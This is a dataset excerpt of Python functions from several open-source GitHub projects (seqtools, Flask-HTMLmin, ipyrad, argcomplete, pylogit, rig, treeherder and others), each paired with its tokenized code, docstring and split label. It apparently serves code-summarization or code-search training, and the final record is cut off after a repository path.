https://github.com/jason-weirather/py-seq-tools/blob/f642c2c73ffef2acc83656a78059a476fc734ca1/seqtools/format/sam/bam/files.py#L46-L52
def _get_block(self):
    """Just read a single block from your current location in _fh"""
    b = self._fh.read(4)  # get block size bytes
    #print self._fh.tell()
    if not b: raise StopIteration
    block_size = struct.unpack('<i',b)[0]
    return self._fh.read(block_size)
[ "def", "_get_block", "(", "self", ")", ":", "b", "=", "self", ".", "_fh", ".", "read", "(", "4", ")", "# get block size bytes", "#print self._fh.tell()", "if", "not", "b", ":", "raise", "StopIteration", "block_size", "=", "struct", ".", "unpack", "(", "'<i'", ",", "b", ")", "[", "0", "]", "return", "self", ".", "_fh", ".", "read", "(", "block_size", ")" ]
Just read a single block from your current location in _fh
[ "Just", "read", "a", "single", "block", "from", "your", "current", "location", "in", "_fh" ]
python
train
38.857143
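A standalone sketch of the length-prefixed read performed above: a 4-byte little-endian signed integer gives the size of the block that follows. The in-memory stream and payload are invented stand-ins for the BAM file handle.

# Reading a length-prefixed block from a made-up byte stream.
import io
import struct

payload = b'example block'
stream = io.BytesIO(struct.pack('<i', len(payload)) + payload)

size = struct.unpack('<i', stream.read(4))[0]
block = stream.read(size)
assert block == payload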
hamidfzm/Flask-HTMLmin
flask_htmlmin/__init__.py
https://github.com/hamidfzm/Flask-HTMLmin/blob/03de23347ac021da4011af36b57903a235268429/flask_htmlmin/__init__.py#L29-L50
def response_minify(self, response):
    """
    minify response html to decrease traffic
    """
    if response.content_type == u'text/html; charset=utf-8':
        endpoint = request.endpoint or ''
        view_func = current_app.view_functions.get(endpoint, None)
        name = (
            '%s.%s' % (view_func.__module__, view_func.__name__)
            if view_func else ''
        )
        if name in self._exempt_routes:
            return response

        response.direct_passthrough = False
        response.set_data(
            self._html_minify.minify(response.get_data(as_text=True))
        )

        return response
    return response
[ "def", "response_minify", "(", "self", ",", "response", ")", ":", "if", "response", ".", "content_type", "==", "u'text/html; charset=utf-8'", ":", "endpoint", "=", "request", ".", "endpoint", "or", "''", "view_func", "=", "current_app", ".", "view_functions", ".", "get", "(", "endpoint", ",", "None", ")", "name", "=", "(", "'%s.%s'", "%", "(", "view_func", ".", "__module__", ",", "view_func", ".", "__name__", ")", "if", "view_func", "else", "''", ")", "if", "name", "in", "self", ".", "_exempt_routes", ":", "return", "response", "response", ".", "direct_passthrough", "=", "False", "response", ".", "set_data", "(", "self", ".", "_html_minify", ".", "minify", "(", "response", ".", "get_data", "(", "as_text", "=", "True", ")", ")", ")", "return", "response", "return", "response" ]
minify response html to decrease traffic
[ "minify", "response", "html", "to", "decrease", "traffic" ]
python
train
32.227273
dereneaton/ipyrad
ipyrad/analysis/baba.py
https://github.com/dereneaton/ipyrad/blob/5eeb8a178160f45faf71bf47cec4abe998a575d1/ipyrad/analysis/baba.py#L895-L988
def _simulate(self, nreps, admix=None, Ns=500000, gen=20):
    """
    Enter a baba.Tree object in which the 'tree' attribute (newick derived
    tree) has edge lengths in units of generations. You can use the 'gen'
    parameter to multiply branch lengths by a constant.

    Parameters:
    -----------

    nreps: (int)
        Number of reps (loci) to simulate under the demographic scenario
    tree: (baba.Tree object)
        A baba.Tree object initialized by calling baba.Tree(*args).
    admix: (list)
        A list of admixture events to occur on the tree. Nodes must be
        reference by their index number, and events must occur in time
        intervals when edges exist. Use the .draw() function of the
        baba.Tree object to see node index numbers and coalescent times.
    Ns: (float)
        Fixed effective population size for all lineages (may allow to
        vary in the future).
    gen: (int)
        A multiplier applied to branch lengths to scale into units of
        generations. Example, if all edges on a tree were 1 then you might
        enter 50000 to multiply so that edges are 50K generations long.
    """

    ## node ages
    Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen

    ## The tips samples, ordered alphanumerically
    ## Population IDs correspond to their indexes in pop config
    ntips = len(self.tree)
    #names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}
    ## rev ladderized leaf name order (left to right on downward facing tree)
    names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])}
    pop_config = [
        ms.PopulationConfiguration(sample_size=2, initial_size=Ns)
        for i in range(ntips)
    ]

    ## migration matrix all zeros init
    migmat = np.zeros((ntips, ntips)).tolist()

    ## a list for storing demographic events
    demog = []

    ## coalescent times
    coals = sorted(list(set(self.verts[:, 1])))[1:]
    for ct in xrange(len(coals)):
        ## check for admix event before next coalescence
        ## ...

        ## print coals[ct], nidxs, time
        nidxs = np.where(self.verts[:, 1] == coals[ct])[0]
        time = Taus[ct+1]

        ## add coalescence at each node
        for nidx in nidxs:
            node = self.tree.search_nodes(name=str(nidx))[0]

            ## get destionation (lowest child idx number), and other
            dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0]
            otherchild = [i for i in node.children if not
                          i.get_leaves_by_name(dest.name)][0]

            ## get source
            if otherchild.is_leaf():
                source = otherchild
            else:
                source = sorted(otherchild.get_leaves(), key=lambda x: x.idx)[0]

            ## add coal events
            event = ms.MassMigration(
                time=int(time),
                source=names[source.name],
                destination=names[dest.name],
                proportion=1.0)
            #print(int(time), names[source.name], names[dest.name])

            ## ...
            demog.append(event)

    ## sim the data
    replicates = ms.simulate(
        population_configurations=pop_config,
        migration_matrix=migmat,
        demographic_events=demog,
        num_replicates=nreps,
        length=100,
        mutation_rate=1e-8)

    return replicates
[ "def", "_simulate", "(", "self", ",", "nreps", ",", "admix", "=", "None", ",", "Ns", "=", "500000", ",", "gen", "=", "20", ")", ":", "## node ages", "Taus", "=", "np", ".", "array", "(", "list", "(", "set", "(", "self", ".", "verts", "[", ":", ",", "1", "]", ")", ")", ")", "*", "1e4", "*", "gen", "## The tips samples, ordered alphanumerically", "## Population IDs correspond to their indexes in pop config", "ntips", "=", "len", "(", "self", ".", "tree", ")", "#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}", "## rev ladderized leaf name order (left to right on downward facing tree)", "names", "=", "{", "name", ":", "idx", "for", "idx", ",", "name", "in", "enumerate", "(", "self", ".", "tree", ".", "get_leaf_names", "(", ")", "[", ":", ":", "-", "1", "]", ")", "}", "pop_config", "=", "[", "ms", ".", "PopulationConfiguration", "(", "sample_size", "=", "2", ",", "initial_size", "=", "Ns", ")", "for", "i", "in", "range", "(", "ntips", ")", "]", "## migration matrix all zeros init", "migmat", "=", "np", ".", "zeros", "(", "(", "ntips", ",", "ntips", ")", ")", ".", "tolist", "(", ")", "## a list for storing demographic events", "demog", "=", "[", "]", "## coalescent times", "coals", "=", "sorted", "(", "list", "(", "set", "(", "self", ".", "verts", "[", ":", ",", "1", "]", ")", ")", ")", "[", "1", ":", "]", "for", "ct", "in", "xrange", "(", "len", "(", "coals", ")", ")", ":", "## check for admix event before next coalescence", "## ...", "## print coals[ct], nidxs, time", "nidxs", "=", "np", ".", "where", "(", "self", ".", "verts", "[", ":", ",", "1", "]", "==", "coals", "[", "ct", "]", ")", "[", "0", "]", "time", "=", "Taus", "[", "ct", "+", "1", "]", "## add coalescence at each node", "for", "nidx", "in", "nidxs", ":", "node", "=", "self", ".", "tree", ".", "search_nodes", "(", "name", "=", "str", "(", "nidx", ")", ")", "[", "0", "]", "## get destionation (lowest child idx number), and other", "dest", "=", "sorted", "(", "node", ".", "get_leaves", "(", ")", ",", "key", "=", "lambda", "x", ":", "x", ".", "idx", ")", "[", "0", "]", "otherchild", "=", "[", "i", "for", "i", "in", "node", ".", "children", "if", "not", "i", ".", "get_leaves_by_name", "(", "dest", ".", "name", ")", "]", "[", "0", "]", "## get source", "if", "otherchild", ".", "is_leaf", "(", ")", ":", "source", "=", "otherchild", "else", ":", "source", "=", "sorted", "(", "otherchild", ".", "get_leaves", "(", ")", ",", "key", "=", "lambda", "x", ":", "x", ".", "idx", ")", "[", "0", "]", "## add coal events", "event", "=", "ms", ".", "MassMigration", "(", "time", "=", "int", "(", "time", ")", ",", "source", "=", "names", "[", "source", ".", "name", "]", ",", "destination", "=", "names", "[", "dest", ".", "name", "]", ",", "proportion", "=", "1.0", ")", "#print(int(time), names[source.name], names[dest.name])", "## ...", "demog", ".", "append", "(", "event", ")", "## sim the data", "replicates", "=", "ms", ".", "simulate", "(", "population_configurations", "=", "pop_config", ",", "migration_matrix", "=", "migmat", ",", "demographic_events", "=", "demog", ",", "num_replicates", "=", "nreps", ",", "length", "=", "100", ",", "mutation_rate", "=", "1e-8", ")", "return", "replicates" ]
Enter a baba.Tree object in which the 'tree' attribute (newick derived tree) has edge lengths in units of generations. You can use the 'gen' parameter to multiply branch lengths by a constant. Parameters: ----------- nreps: (int) Number of reps (loci) to simulate under the demographic scenario tree: (baba.Tree object) A baba.Tree object initialized by calling baba.Tree(*args). admix: (list) A list of admixture events to occur on the tree. Nodes must be reference by their index number, and events must occur in time intervals when edges exist. Use the .draw() function of the baba.Tree object to see node index numbers and coalescent times. Ns: (float) Fixed effective population size for all lineages (may allow to vary in the future). gen: (int) A multiplier applied to branch lengths to scale into units of generations. Example, if all edges on a tree were 1 then you might enter 50000 to multiply so that edges are 50K generations long.
[ "Enter", "a", "baba", ".", "Tree", "object", "in", "which", "the", "tree", "attribute", "(", "newick", "derived", "tree", ")", "has", "edge", "lengths", "in", "units", "of", "generations", ".", "You", "can", "use", "the", "gen", "parameter", "to", "multiply", "branch", "lengths", "by", "a", "constant", "." ]
python
valid
36.159574
kislyuk/argcomplete
argcomplete/__init__.py
https://github.com/kislyuk/argcomplete/blob/f9eb0a2354d9e6153f687c463df98c16251d97ed/argcomplete/__init__.py#L515-L561
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos):
    """
    If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
    occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
    Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
    completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.

    If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
    adds a space after the completion.

    This method is exposed for overriding in subclasses; there is no need to use it directly.
    """
    special_chars = "\\"
    # If the word under the cursor was quoted, escape the quote char.
    # Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.
    if cword_prequote == "":
        # Bash mangles completions which contain characters in COMP_WORDBREAKS.
        # This workaround has the same effect as __ltrim_colon_completions in bash_completion
        # (extended to characters other than the colon).
        if last_wordbreak_pos:
            completions = [c[last_wordbreak_pos + 1:] for c in completions]
        special_chars += "();<>|&!`$* \t\n\"'"
    elif cword_prequote == '"':
        special_chars += '"`$!'

    if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh":
        # tcsh escapes special characters itself.
        special_chars = ""
    elif cword_prequote == "'":
        # Nothing can be escaped in single quotes, so we need to close
        # the string, escape the single quote, then open a new string.
        special_chars = ""
        completions = [c.replace("'", r"'\''") for c in completions]

    for char in special_chars:
        completions = [c.replace(char, "\\" + char) for c in completions]

    if self.append_space:
        # Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete.
        # Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character.
        # This code is retained for environments where this isn't done natively.
        continuation_chars = "=/:"
        if len(completions) == 1 and completions[0][-1] not in continuation_chars:
            if cword_prequote == "":
                completions[0] += " "

    return completions
[ "def", "quote_completions", "(", "self", ",", "completions", ",", "cword_prequote", ",", "last_wordbreak_pos", ")", ":", "special_chars", "=", "\"\\\\\"", "# If the word under the cursor was quoted, escape the quote char.", "# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.", "if", "cword_prequote", "==", "\"\"", ":", "# Bash mangles completions which contain characters in COMP_WORDBREAKS.", "# This workaround has the same effect as __ltrim_colon_completions in bash_completion", "# (extended to characters other than the colon).", "if", "last_wordbreak_pos", ":", "completions", "=", "[", "c", "[", "last_wordbreak_pos", "+", "1", ":", "]", "for", "c", "in", "completions", "]", "special_chars", "+=", "\"();<>|&!`$* \\t\\n\\\"'\"", "elif", "cword_prequote", "==", "'\"'", ":", "special_chars", "+=", "'\"`$!'", "if", "os", ".", "environ", ".", "get", "(", "\"_ARGCOMPLETE_SHELL\"", ")", "==", "\"tcsh\"", ":", "# tcsh escapes special characters itself.", "special_chars", "=", "\"\"", "elif", "cword_prequote", "==", "\"'\"", ":", "# Nothing can be escaped in single quotes, so we need to close", "# the string, escape the single quote, then open a new string.", "special_chars", "=", "\"\"", "completions", "=", "[", "c", ".", "replace", "(", "\"'\"", ",", "r\"'\\''\"", ")", "for", "c", "in", "completions", "]", "for", "char", "in", "special_chars", ":", "completions", "=", "[", "c", ".", "replace", "(", "char", ",", "\"\\\\\"", "+", "char", ")", "for", "c", "in", "completions", "]", "if", "self", ".", "append_space", ":", "# Similar functionality in bash was previously turned off by supplying the \"-o nospace\" option to complete.", "# Now it is conditionally disabled using \"compopt -o nospace\" if the match ends in a continuation character.", "# This code is retained for environments where this isn't done natively.", "continuation_chars", "=", "\"=/:\"", "if", "len", "(", "completions", ")", "==", "1", "and", "completions", "[", "0", "]", "[", "-", "1", "]", "not", "in", "continuation_chars", ":", "if", "cword_prequote", "==", "\"\"", ":", "completions", "[", "0", "]", "+=", "\" \"", "return", "completions" ]
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes occurrences of that quote character in the completions, and adds the quote to the beginning of each completion. Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of completions before the first colon if (``COMP_WORDBREAKS``) contains a colon. If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``), adds a space after the completion. This method is exposed for overriding in subclasses; there is no need to use it directly.
[ "If", "the", "word", "under", "the", "cursor", "started", "with", "a", "quote", "(", "as", "indicated", "by", "a", "nonempty", "cword_prequote", ")", "escapes", "occurrences", "of", "that", "quote", "character", "in", "the", "completions", "and", "adds", "the", "quote", "to", "the", "beginning", "of", "each", "completion", ".", "Otherwise", "escapes", "all", "characters", "that", "bash", "splits", "words", "on", "(", "COMP_WORDBREAKS", ")", "and", "removes", "portions", "of", "completions", "before", "the", "first", "colon", "if", "(", "COMP_WORDBREAKS", ")", "contains", "a", "colon", "." ]
python
train
55.595745
timothyb0912/pylogit
pylogit/base_multinomial_cm_v2.py
https://github.com/timothyb0912/pylogit/blob/f83b0fd6debaa7358d87c3828428f6d4ead71357/pylogit/base_multinomial_cm_v2.py#L296-L327
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids):
    """
    Ensures that the alternative id's in `nest_spec` are all associated with
    a nest. Raises a helpful ValueError if they are not.

    Parameters
    ----------
    nest_spec : OrderedDict, or None, optional.
        Keys are strings that define the name of the nests. Values are lists
        of alternative ids, denoting which alternatives belong to which
        nests. Each alternative id must only be associated with a single
        nest! Default == None.
    list_elements : list of ints.
        Each element should correspond to one of the alternatives identified
        as belonging to a nest.
    all_ids : list of ints.
        Each element should correspond to one of the alternatives that is
        present in the universal choice set for this model.

    Returns
    -------
    None.
    """
    unaccounted_alt_ids = []
    for alt_id in all_ids:
        if alt_id not in list_elements:
            unaccounted_alt_ids.append(alt_id)
    if unaccounted_alt_ids != []:
        msg = "Associate the following alternative ids with a nest: {}"
        raise ValueError(msg.format(unaccounted_alt_ids))

    return None
[ "def", "ensure_all_alt_ids_have_a_nest", "(", "nest_spec", ",", "list_elements", ",", "all_ids", ")", ":", "unaccounted_alt_ids", "=", "[", "]", "for", "alt_id", "in", "all_ids", ":", "if", "alt_id", "not", "in", "list_elements", ":", "unaccounted_alt_ids", ".", "append", "(", "alt_id", ")", "if", "unaccounted_alt_ids", "!=", "[", "]", ":", "msg", "=", "\"Associate the following alternative ids with a nest: {}\"", "raise", "ValueError", "(", "msg", ".", "format", "(", "unaccounted_alt_ids", ")", ")", "return", "None" ]
Ensures that the alternative id's in `nest_spec` are all associated with a nest. Raises a helpful ValueError if they are not. Parameters ---------- nest_spec : OrderedDict, or None, optional. Keys are strings that define the name of the nests. Values are lists of alternative ids, denoting which alternatives belong to which nests. Each alternative id must only be associated with a single nest! Default == None. list_elements : list of ints. Each element should correspond to one of the alternatives identified as belonging to a nest. all_ids : list of ints. Each element should correspond to one of the alternatives that is present in the universal choice set for this model. Returns ------- None.
[ "Ensures", "that", "the", "alternative", "id", "s", "in", "nest_spec", "are", "all", "associated", "with", "a", "nest", ".", "Raises", "a", "helpful", "ValueError", "if", "they", "are", "not", "." ]
python
train
37.03125
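A sketch of the inputs the check above expects, with invented ids. Reading from the docstring, list_elements is the flattened collection of ids that appear in nest_spec, so any id in all_ids missing from it would trigger the ValueError.

# Hypothetical inputs; the check below mirrors the loop in the function above.
from collections import OrderedDict
from itertools import chain

nest_spec = OrderedDict([('fast', [1, 2]), ('slow', [3])])
list_elements = list(chain.from_iterable(nest_spec.values()))   # [1, 2, 3]
all_ids = [1, 2, 3, 4]

missing = [i for i in all_ids if i not in list_elements]
print(missing)   # [4] -- ensure_all_alt_ids_have_a_nest would raise ValueError here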
MartinThoma/hwrt
hwrt/filter_dataset.py
https://github.com/MartinThoma/hwrt/blob/725c21a3d0f5a30b8492cbc184b3688ceb364e1c/hwrt/filter_dataset.py#L200-L217
def load_raw(raw_pickle_file):
    """
    Load a pickle file of raw recordings.

    Parameters
    ----------
    raw_pickle_file : str
        Path to a pickle file which contains raw recordings.

    Returns
    -------
    dict
        The loaded pickle file.
    """
    with open(raw_pickle_file, 'rb') as f:
        raw = pickle.load(f)
    logging.info("Loaded %i recordings.", len(raw['handwriting_datasets']))
    return raw
[ "def", "load_raw", "(", "raw_pickle_file", ")", ":", "with", "open", "(", "raw_pickle_file", ",", "'rb'", ")", "as", "f", ":", "raw", "=", "pickle", ".", "load", "(", "f", ")", "logging", ".", "info", "(", "\"Loaded %i recordings.\"", ",", "len", "(", "raw", "[", "'handwriting_datasets'", "]", ")", ")", "return", "raw" ]
Load a pickle file of raw recordings. Parameters ---------- raw_pickle_file : str Path to a pickle file which contains raw recordings. Returns ------- dict The loaded pickle file.
[ "Load", "a", "pickle", "file", "of", "raw", "recordings", "." ]
python
train
23.222222
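A minimal round trip for the loader above. The import path is assumed from the record's path field, and the recordings dict is made up; all the loader requires is a pickle containing a 'handwriting_datasets' key.

# Hypothetical pickle round trip; the contents are invented.
import pickle
import tempfile

from hwrt.filter_dataset import load_raw  # module name assumed from the path field above

fake_raw = {'handwriting_datasets': [{'id': 1}, {'id': 2}]}
with tempfile.NamedTemporaryFile(suffix='.pickle', delete=False) as f:
    pickle.dump(fake_raw, f)
    path = f.name

raw = load_raw(path)   # returns the dict; logging.info reports the record count
assert len(raw['handwriting_datasets']) == 2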
project-rig/rig
rig/routing_table/utils.py
https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L8-L83
def routing_tree_to_tables(routes, net_keys):
    """Convert a set of
    :py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a
    per-chip set of routing tables.

    .. warning::
        A :py:exc:`rig.routing_table.MultisourceRouteError` will be raised if
        entries with identical keys and masks but with differing routes are
        generated. This is not a perfect test, entries which would otherwise
        collide are not spotted.

    .. warning::
        The routing trees provided are assumed to be correct and continuous
        (not missing any hops). If this is not the case, the output is
        undefined.

    .. note::
        If a routing tree has a terminating vertex whose route is set to None,
        that vertex is ignored.

    Parameters
    ----------
    routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
              ...}
        The complete set of RoutingTrees representing all routes in the
        system. (Note: this is the same data structure produced by routers in
        the :py:mod:`~rig.place_and_route` module.)
    net_keys : {net: (key, mask), ...}
        The key and mask associated with each net.

    Returns
    -------
    {(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
    """
    # Pairs of inbound and outbound routes.
    InOutPair = namedtuple("InOutPair", "ins, outs")

    # {(x, y): {(key, mask): _InOutPair}}
    route_sets = defaultdict(OrderedDict)

    for net, routing_tree in iteritems(routes):
        key, mask = net_keys[net]

        # The direction is the Links entry which describes the direction in
        # which we last moved to reach the node (or None for the root).
        for direction, (x, y), out_directions in routing_tree.traverse():
            # Determine the in_direction
            in_direction = direction
            if in_direction is not None:
                in_direction = direction.opposite

            # Add a routing entry
            if (key, mask) in route_sets[(x, y)]:
                # If there is an existing route set raise an error if the out
                # directions are not equivalent.
                if route_sets[(x, y)][(key, mask)].outs != out_directions:
                    raise MultisourceRouteError(key, mask, (x, y))

                # Otherwise, add the input directions as this represents a
                # merge of the routes.
                route_sets[(x, y)][(key, mask)].ins.add(in_direction)
            else:
                # Otherwise create a new route set
                route_sets[(x, y)][(key, mask)] = \
                    InOutPair({in_direction}, set(out_directions))

    # Construct the routing tables from the route sets
    routing_tables = defaultdict(list)
    for (x, y), routes in iteritems(route_sets):
        for (key, mask), route in iteritems(routes):
            # Add the route
            routing_tables[(x, y)].append(
                RoutingTableEntry(route.outs, key, mask, route.ins)
            )

    return routing_tables
[ "def", "routing_tree_to_tables", "(", "routes", ",", "net_keys", ")", ":", "# Pairs of inbound and outbound routes.", "InOutPair", "=", "namedtuple", "(", "\"InOutPair\"", ",", "\"ins, outs\"", ")", "# {(x, y): {(key, mask): _InOutPair}}", "route_sets", "=", "defaultdict", "(", "OrderedDict", ")", "for", "net", ",", "routing_tree", "in", "iteritems", "(", "routes", ")", ":", "key", ",", "mask", "=", "net_keys", "[", "net", "]", "# The direction is the Links entry which describes the direction in", "# which we last moved to reach the node (or None for the root).", "for", "direction", ",", "(", "x", ",", "y", ")", ",", "out_directions", "in", "routing_tree", ".", "traverse", "(", ")", ":", "# Determine the in_direction", "in_direction", "=", "direction", "if", "in_direction", "is", "not", "None", ":", "in_direction", "=", "direction", ".", "opposite", "# Add a routing entry", "if", "(", "key", ",", "mask", ")", "in", "route_sets", "[", "(", "x", ",", "y", ")", "]", ":", "# If there is an existing route set raise an error if the out", "# directions are not equivalent.", "if", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", ".", "outs", "!=", "out_directions", ":", "raise", "MultisourceRouteError", "(", "key", ",", "mask", ",", "(", "x", ",", "y", ")", ")", "# Otherwise, add the input directions as this represents a", "# merge of the routes.", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", ".", "ins", ".", "add", "(", "in_direction", ")", "else", ":", "# Otherwise create a new route set", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", "=", "InOutPair", "(", "{", "in_direction", "}", ",", "set", "(", "out_directions", ")", ")", "# Construct the routing tables from the route sets", "routing_tables", "=", "defaultdict", "(", "list", ")", "for", "(", "x", ",", "y", ")", ",", "routes", "in", "iteritems", "(", "route_sets", ")", ":", "for", "(", "key", ",", "mask", ")", ",", "route", "in", "iteritems", "(", "routes", ")", ":", "# Add the route", "routing_tables", "[", "(", "x", ",", "y", ")", "]", ".", "append", "(", "RoutingTableEntry", "(", "route", ".", "outs", ",", "key", ",", "mask", ",", "route", ".", "ins", ")", ")", "return", "routing_tables" ]
Convert a set of :py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip set of routing tables. .. warning:: A :py:exc:`rig.routing_table.MultisourceRouteError` will be raised if entries with identical keys and masks but with differing routes are generated. This is not a perfect test, entries which would otherwise collide are not spotted. .. warning:: The routing trees provided are assumed to be correct and continuous (not missing any hops). If this is not the case, the output is undefined. .. note:: If a routing tree has a terminating vertex whose route is set to None, that vertex is ignored. Parameters ---------- routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \ ...} The complete set of RoutingTrees representing all routes in the system. (Note: this is the same data structure produced by routers in the :py:mod:`~rig.place_and_route` module.) net_keys : {net: (key, mask), ...} The key and mask associated with each net. Returns ------- {(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
[ "Convert", "a", "set", "of", ":", "py", ":", "class", ":", "~rig", ".", "place_and_route", ".", "routing_tree", ".", "RoutingTree", "s", "into", "a", "per", "-", "chip", "set", "of", "routing", "tables", "." ]
python
train
39.184211
mozilla/treeherder
treeherder/etl/jobs.py
https://github.com/mozilla/treeherder/blob/cc47bdec872e5c668d0f01df89517390a164cda3/treeherder/etl/jobs.py#L331-L372
def _schedule_log_parsing(job, job_logs, result):
    """Kick off the initial task that parses the log data.

    log_data is a list of job log objects and the result for that job
    """
    # importing here to avoid an import loop
    from treeherder.log_parser.tasks import parse_logs

    task_types = {
        "errorsummary_json",
        "buildbot_text",
        "builds-4h"
    }

    job_log_ids = []
    for job_log in job_logs:
        # a log can be submitted already parsed.  So only schedule
        # a parsing task if it's ``pending``
        # the submitter is then responsible for submitting the
        # text_log_summary artifact
        if job_log.status != JobLog.PENDING:
            continue

        # if this is not a known type of log, abort parse
        if job_log.name not in task_types:
            continue

        job_log_ids.append(job_log.id)

    # TODO: Replace the use of different queues for failures vs not with the
    # RabbitMQ priority feature (since the idea behind separate queues was
    # only to ensure failures are dealt with first if there is a backlog).
    if result != 'success':
        queue = 'log_parser_fail'
        priority = 'failures'
    else:
        queue = 'log_parser'
        priority = "normal"

    parse_logs.apply_async(queue=queue,
                           args=[job.id, job_log_ids, priority])
[ "def", "_schedule_log_parsing", "(", "job", ",", "job_logs", ",", "result", ")", ":", "# importing here to avoid an import loop", "from", "treeherder", ".", "log_parser", ".", "tasks", "import", "parse_logs", "task_types", "=", "{", "\"errorsummary_json\"", ",", "\"buildbot_text\"", ",", "\"builds-4h\"", "}", "job_log_ids", "=", "[", "]", "for", "job_log", "in", "job_logs", ":", "# a log can be submitted already parsed. So only schedule", "# a parsing task if it's ``pending``", "# the submitter is then responsible for submitting the", "# text_log_summary artifact", "if", "job_log", ".", "status", "!=", "JobLog", ".", "PENDING", ":", "continue", "# if this is not a known type of log, abort parse", "if", "job_log", ".", "name", "not", "in", "task_types", ":", "continue", "job_log_ids", ".", "append", "(", "job_log", ".", "id", ")", "# TODO: Replace the use of different queues for failures vs not with the", "# RabbitMQ priority feature (since the idea behind separate queues was", "# only to ensure failures are dealt with first if there is a backlog).", "if", "result", "!=", "'success'", ":", "queue", "=", "'log_parser_fail'", "priority", "=", "'failures'", "else", ":", "queue", "=", "'log_parser'", "priority", "=", "\"normal\"", "parse_logs", ".", "apply_async", "(", "queue", "=", "queue", ",", "args", "=", "[", "job", ".", "id", ",", "job_log_ids", ",", "priority", "]", ")" ]
Kick off the initial task that parses the log data. log_data is a list of job log objects and the result for that job
[ "Kick", "off", "the", "initial", "task", "that", "parses", "the", "log", "data", "." ]
python
train
31.690476
Robpol86/etaprogress
etaprogress/components/units.py
https://github.com/Robpol86/etaprogress/blob/224e8a248c2bf820bad218763281914ad3983fff/etaprogress/components/units.py#L82-L93
def auto(self): """Returns the highest whole-number unit.""" if self._value >= 1099511627776: return self.TiB, 'TiB' if self._value >= 1073741824: return self.GiB, 'GiB' if self._value >= 1048576: return self.MiB, 'MiB' if self._value >= 1024: return self.KiB, 'KiB' else: return self.B, 'B'
[ "def", "auto", "(", "self", ")", ":", "if", "self", ".", "_value", ">=", "1099511627776", ":", "return", "self", ".", "TiB", ",", "'TiB'", "if", "self", ".", "_value", ">=", "1073741824", ":", "return", "self", ".", "GiB", ",", "'GiB'", "if", "self", ".", "_value", ">=", "1048576", ":", "return", "self", ".", "MiB", ",", "'MiB'", "if", "self", ".", "_value", ">=", "1024", ":", "return", "self", ".", "KiB", ",", "'KiB'", "else", ":", "return", "self", ".", "B", ",", "'B'" ]
Returns the highest whole-number unit.
[ "Returns", "the", "highest", "whole", "-", "number", "unit", "." ]
python
train
32.333333
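A minimal standalone sketch of the unit-selection thresholds shown in the `auto` property above, assuming a plain integer byte count; the function name `pick_binary_unit` is illustrative and not part of etaprogress:

def pick_binary_unit(num_bytes):
    """Return (scaled_value, unit_label) using binary (1024-based) thresholds."""
    # Thresholds mirror the record above: TiB, GiB, MiB, KiB, then plain bytes.
    for factor, label in ((1099511627776, 'TiB'), (1073741824, 'GiB'),
                          (1048576, 'MiB'), (1024, 'KiB')):
        if num_bytes >= factor:
            return num_bytes / factor, label
    return num_bytes, 'B'

print(pick_binary_unit(5 * 1048576))  # -> (5.0, 'MiB')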
Kane610/deconz
pydeconz/light.py
https://github.com/Kane610/deconz/blob/8a9498dbbc8c168d4a081173ad6c3b1e17fffdf6/pydeconz/light.py#L25-L32
def async_update(self, event): """New event for light. Check that state is part of event. Signal that light has updated state. """ self.update_attr(event.get('state', {})) super().async_update(event)
[ "def", "async_update", "(", "self", ",", "event", ")", ":", "self", ".", "update_attr", "(", "event", ".", "get", "(", "'state'", ",", "{", "}", ")", ")", "super", "(", ")", ".", "async_update", "(", "event", ")" ]
New event for light. Check that state is part of event. Signal that light has updated state.
[ "New", "event", "for", "light", "." ]
python
train
30.125
ArchiveTeam/wpull
wpull/network/dns.py
https://github.com/ArchiveTeam/wpull/blob/ddf051aa3322479325ba20aa778cb2cb97606bf5/wpull/network/dns.py#L95-L98
def rotate(self): '''Move the first address to the last position.''' item = self._address_infos.pop(0) self._address_infos.append(item)
[ "def", "rotate", "(", "self", ")", ":", "item", "=", "self", ".", "_address_infos", ".", "pop", "(", "0", ")", "self", ".", "_address_infos", ".", "append", "(", "item", ")" ]
Move the first address to the last position.
[ "Move", "the", "first", "address", "to", "the", "last", "position", "." ]
python
train
39
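A small sketch of the same round-robin idea, assuming a plain list of address tuples rather than wpull's internal resolver state:

def rotate(addresses):
    """Move the first address to the end of the list, in place."""
    item = addresses.pop(0)
    addresses.append(item)

addrs = [('192.0.2.1', 80), ('192.0.2.2', 80), ('192.0.2.3', 80)]
rotate(addrs)
print(addrs)  # [('192.0.2.2', 80), ('192.0.2.3', 80), ('192.0.2.1', 80)]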
RudolfCardinal/pythonlib
cardinal_pythonlib/wsgi/reverse_proxied_mw.py
